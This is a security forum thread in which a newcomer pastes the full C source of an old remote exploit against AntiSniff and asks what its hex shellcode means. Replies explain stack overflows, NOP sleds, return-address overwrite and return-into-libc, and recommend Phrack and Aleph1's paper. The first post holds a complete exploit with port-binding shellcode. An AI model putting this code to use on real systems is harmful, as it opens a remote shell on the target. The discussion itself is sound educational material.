Results 1 to 10 of 10

Thread: how do exploits work? in a coding way..

  1. #1

    how do exploits work? in a coding way..

    hi all,

    i was wondering how exploits work, and i don't mean, you find an vulnerability and exploit it, but more in the line of coding.

    source of a random selected exploit:
    Code:
    /* l0phtl0phe.c - antisniff exploit (1-1-1 "second fixed version" included)
     *
     * -scut/teso
     *
     * gcc -o l0phtl0phe l0phtl0phe.c -Wall -lnet `libnet-config --defines`
     *
     * description:
     * l0pht messed up the fix for their problem in antisniff by not regarding
     * the type signedness properties of the char and int values used. this
     * results in a cool method bypassing the too extra checks (length + strncat).
     * some work on this topic have been done by mixter, (bad results on type
     * casting), but it should be obvious to any security conscious programmers.
     * i'm not stating that they aren't allowed errors, but they should fix it
     * for sure if they're going to fix it at all.  -sc.
     *
     * 2nd version: script kiddie proof to avoid that "doesn't work" lamer claim.
     *
     * greetings to all teso, lam3rz, hert, adm, w00w00 and lsd ppl.
     */
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <netinet/in.h>
    #include <arpa/nameser.h>
    #include <libnet.h>
    
    
    #define	OFFSET		0xbffef9a0
    
    unsigned int	build_xp (unsigned char *xp);
    
    
    int
    main (int argc, char *argv[])
    {
    	int		sock;		/* raw socket */
    	u_long		src_ip,
    			dst_ip;
    
    	unsigned char	xpbuf[1024];	/* this one gets complicated now */
    	unsigned char	tpack[2048];	/* paket buffer */
    	unsigned int	pl_len;
    
    
    	if (argc != 3) {
    		printf ("usage: %s <source ip> <dest ip>\n\n", argv[0]);
    
    		exit (EXIT_FAILURE);
    	}
    
    	sock = libnet_open_raw_sock (IPPROTO_RAW);
    	if (sock == -1) {
    		perror ("libnet_open_raw_sock");
    		exit (EXIT_FAILURE);
    	}
    
    	src_ip  = libnet_name_resolve (argv[1], 0);
    	dst_ip  = libnet_name_resolve (argv[2], 0);
    
    	pl_len = build_xp (xpbuf);
    
    	libnet_build_ip (UDP_H + DNS_H + pl_len, 0, 7350, 0, 2, IPPROTO_UDP,
    		src_ip, dst_ip, NULL, 0, tpack);
    	libnet_build_udp (libnet_get_prand (PRu16), 53, NULL, 0,
    		tpack + IP_H);
    	libnet_build_dns (libnet_get_prand (PRu16), 0x0000, 1, 0, 0, 0,
    		xpbuf, pl_len, tpack + IP_H + UDP_H);
    	libnet_do_checksum (tpack, IPPROTO_UDP, UDP_H + DNS_H + pl_len);
    
    	/* they use "udp and dst port 53" as bpf, so we should have no problem
    	 */
    	libnet_write_ip (sock, tpack, UDP_H + IP_H + DNS_H + pl_len);
    	libnet_close_raw_sock (sock);
    
    	printf ("exploitation succeeded.\n");
    	printf ("try: \"telnet %s 17664\" now.\n", argv[2]);
    
    	exit (EXIT_SUCCESS);
    }
    
    
    /* build_xp
     *
     * build exploit buffer into buffer pointed to by `xp'.
     */
    
    unsigned int
    build_xp (unsigned char *xp)
    {
    	int		i;
    	unsigned char	buf[1024];
    	unsigned char	shellcode[] =
    		/* portshell 17644 portshellcode by smiler & scut */
    		"\x31\xc0\xb0\x02\xcd\x80\x09\xc0\x74\x06\x31\xc0"
    		"\xfe\xc0\xcd\x80\xeb\x76\x5f\x89\x4f\x10\xfe\xc1"
    		"\x89\x4f\x0c\xfe\xc1\x89\x4f\x08\x8d\x4f\x08\xfe"
    		"\xc3\xb0\x66\xcd\x80\xfe\xc3\xc6\x47\x10\x10\x66"
    		"\x89\x5f\x14\x88\x47\x08\xb0\x45\x66\x89\x47\x16"
    		"\x89\x57\x18\x8d\x4f\x14\x89\x4f\x0c\x8d\x4f\x08"
    		"\xb0\x66\xcd\x80\x89\x5f\x0c\xfe\xc3\xfe\xc3\xb0"
    		"\x66\xcd\x80\x89\x57\x0c\x89\x57\x10\xfe\xc3\xb0"
    		"\x66\xcd\x80\x31\xc9\x88\xc3\xb0\x3f\xcd\x80\xfe"
    		"\xc1\xb0\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80\x31"
    		"\xd2\x88\x57\x07\x89\x7f\x0c\x89\xfb\x8d\x4f\x0c"
    		"\xb0\x0b\xcd\x80\x31\xc0\x99\x31\xdb\x31\xc9\xe8"
    		"\x7e\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
    
    	unsigned char	head[] =
    		"\x07-7350-\x00\xfe";
    
    	memcpy (buf, head, 9);
    	for (i = 9 ; i < (sizeof (buf) - strlen (shellcode)) ; ++i)
    		buf[i] = '\x90';
    	memcpy (buf + sizeof (buf) - strlen (shellcode), shellcode,
    		strlen (shellcode));
    
    	buf[272] = '\xeb';
    	buf[273] = '\x08';
    	buf[274] = (OFFSET      ) & 0xff;
    	buf[275] = (OFFSET >>  8) & 0xff;
    	buf[276] = (OFFSET >> 16) & 0xff;
    	buf[277] = (OFFSET >> 24) & 0xff;
    
    	memcpy (xp, buf, sizeof (buf));
    
    	return (sizeof (buf));;
    }
    now this is written in C, and most of the stuff i understand, but
    parts like
    Code:
    /* portshell 17644 portshellcode by smiler & scut */
    		"\x31\xc0\xb0\x02\xcd\x80\x09\xc0\x74\x06\x31\xc0"
    		"\xfe\xc0\xcd\x80\xeb\x76\x5f\x89\x4f\x10\xfe\xc1"
    		"\x89\x4f\x0c\xfe\xc1\x89\x4f\x08\x8d\x4f\x08\xfe"
    		"\xc3\xb0\x66\xcd\x80\xfe\xc3\xc6\x47\x10\x10\x66"
    		"\x89\x5f\x14\x88\x47\x08\xb0\x45\x66\x89\x47\x16"
    		"\x89\x57\x18\x8d\x4f\x14\x89\x4f\x0c\x8d\x4f\x08"
    		"\xb0\x66\xcd\x80\x89\x5f\x0c\xfe\xc3\xfe\xc3\xb0"
    		"\x66\xcd\x80\x89\x57\x0c\x89\x57\x10\xfe\xc3\xb0"
    		"\x66\xcd\x80\x31\xc9\x88\xc3\xb0\x3f\xcd\x80\xfe"
    		"\xc1\xb0\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80\x31"
    		"\xd2\x88\x57\x07\x89\x7f\x0c\x89\xfb\x8d\x4f\x0c"
    		"\xb0\x0b\xcd\x80\x31\xc0\x99\x31\xdb\x31\xc9\xe8"
    		"\x7e\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
    are completely unknown to me, is it code in hex, and if so, is it assembly, binary code, or C in hex, (although i doubt it will be the last).

    and if so, how can you learn what the above peace of code means?

    i put this is the programming section, since it has to do with coding...

    thanks in advance for replying

  2. #2
    Senior Member
    Join Date
    Apr 2002
    Posts
    634
    The part of code which you don't understand is a shellcode. It's an assembly code modified and formatted in order to be interpreted as would be a shell. It is commonly used to inject code via a buffer overflow.

    Check ShellForge if you want to practice a bit about shellcodes.

    edit: You should also read the famous Aleph1 article on Phrack: Smashing The Stack For Fun And Profit
    Life is boring. Play NetHack... --more--

  3. #3
    Senior Member
    Join Date
    Jan 2003
    Posts
    274
    Another excellent read on the subject is Exploiting Software, How to Break Code by Greg Hoglund and Gary McGraw.

    You can find it on Amazon, or order it direct from the author at Rootkit

  4. #4
    Senior Member
    Join Date
    Jun 2003
    Posts
    772
    Basically a stack overflow works like this: suppose you have a buffer:
    char buffer[128];

    because of some function like strcpy() which then puts data in the buffer which doesn't check boundaries you can write past the buffer. So you put your shellcode (hex opcodes) to for example bind a shell in the buffer and fill the not-filled space with NOP's. Overwriting the buffer is necessary to modify the intruction pointer (EIP) so you can make it to point to the buffer itself so the code in it gets executed when the function returns.
    Normally it's like this in memory:
    Buffer - EBP - ESP - EIP (I could be wrong about the stack pointer (ESP). So you have to keep in mind that you are not only overwriting the eip.

    Check the prevously mentioned articles/papers on how to do this in practice.

    EDIT: you may also have heard about a non-exectable stack. This makes the classic stack overflow approach impossible. Hence on linux there's the return-into-libc technique, on windows you can return to WinExec() or something other useful. Actually this is easier to achieve (on windows at least, don't know about return-into-libc, I suppose same difficulty) than the classic approach as you don't have to use shellcode per se.
    The above sentences are produced by the propaganda and indoctrination of people manipulating my mind since 1987, hence, I cannot be held responsible for this post\'s content - me

    www.elhalf.com

  5. #5
    Senior Member
    Join Date
    Jul 2003
    Posts
    634
    theres stack overflows, format string bugs, .data field exploits. the majority of these exploits involve putting stuff in memory (be it stack or heap) that causes the program to act in a different way, usually it is possible to make the return address jump somewhere else so that it points to the shellcode that an attacker has crafted, the shell code is basically opcodes for a process, such as starting a shell. the messed up program jumps to where the shellcode is held in memory, the shell code is then executed

    its called shellcode cos it was meant for opening a shell, hence shellcode...but its not limited to this and you can do other things such as create files.

    i2c

  6. #6
    PHP/PostgreSQL guy
    Join Date
    Dec 2001
    Posts
    1,164
    And you also have race conditions in code where the author unknowingly put in something that relies on dependent timing conditions. Examples of this could be the temporary creation of a file containing important data (and/or being able to be exploited because of ownership/rights), control-c/z/etc for data interruption, able to pipe commands into an executed script...
    We the willing, led by the unknowing, have been doing the impossible for the ungrateful. We have done so much with so little for so long that we are now qualified to do just about anything with almost nothing.

  7. #7
    Junior Member
    Join Date
    Aug 2004
    Posts
    14
    Hi! There are a load of links in this thread at sfdc: http://www.security-forums.com/forum...&view=previous
    They have computers, and they may have other weapons of mass destruction. (Janet Reno)

    I think computer viruses should count as life. I think it says something about human nature that the only form of life we have created so far is purely destructive. We\'ve created life in our own image. (Stephen Hawking)

  8. #8
    wow!, plenty of things to read for me , thanks a lot for the replies, i think i will be busy the next few days reading all that is given by you guys

    thanks again!

  9. #9
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,401
    KissCool already posted a link to Aleph1's article on Phrack. Look around Phrack Magazine they have lots of fun articles. Some good, some bad, some really complicated, some really easy. There's something for everybody.
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  10. #10
    yes, i've seen the phrack magazine before, but as i looked and googled for shellcode, i found that it is easy to create code and use a tool to convert it to shellcode, but it is pretty hard to do it yourself, or even write a program that can do that.. but i will absolutely check out the magazine again , thanks.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •